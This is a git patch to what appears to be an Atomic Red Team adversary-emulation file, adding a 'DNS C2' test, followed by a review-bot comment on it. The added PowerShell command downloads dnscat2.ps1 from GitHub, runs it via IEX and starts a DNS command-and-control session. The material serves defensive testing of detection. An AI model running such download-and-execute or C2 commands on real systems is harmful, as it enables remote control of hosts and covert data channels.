From c9bf800a2972fe7b4f4a46d0bb91e94caa8691ce Mon Sep 17 00:00:00 2001
From: MrOrOneEquals1
Date: Thu, 6 Feb 2020 09:00:15 -0700
Subject: [PATCH] T1071 - adding DNS C2 (#825)
* DNS C2
* DNS C2 - Fix Typos
Co-authored-by: Carrie Roberts
---
 atomics/T1071/T1071.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
diff --git a/atomics/T1071/T1071.yaml b/atomics/T1071/T1071.yaml
index 62d8c643..f5d36239 100644
--- a/atomics/T1071/T1071.yaml
+++ b/atomics/T1071/T1071.yaml
@@ -160,3 +160,28 @@ atomic_tests:
 command: |
 Set-Location $PathToAtomicsFolder
 .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
+
+- name: DNS C2
+ description: |
+ This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
+ The following blogs have more information.
+ https://github.com/iagox86/dnscat2
+ https://github.com/lukebaggett/dnscat2-powershell
+
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain Name configured to use DNS Server where your C2 listener is running
+ type: string
+ default: example.com
+ server_ip:
+ description: IP address of DNS server where your C2 listener is running
+ type: string
+ default: 127.0.0.1
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
+ Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
\ No newline at end of file
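Review bot: The `command` block of the new `DNS C2` test fetches `dnscat2.ps1` and runs it through `IEX` on every execution, with no `cleanup_command` and no prerequisite step. A failed download would therefore surface only as an unrecognised `Start-Dnscat2` command, and a successful run may leave the client process alive on the test host. Pinning the URL to a commit is a good choice and should stay; on Windows PowerShell hosts whose .NET defaults exclude TLS 1.2 the fetch can fail, so consider adding `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` before the `IEX` line. I would also add a `cleanup_command` that ends the session the test started, and say in `description` that the defaults `example.com` / `127.0.0.1` appear to generate no off-host traffic until both arguments are overridden. The description calls the two links "blogs", but both point to GitHub repositories.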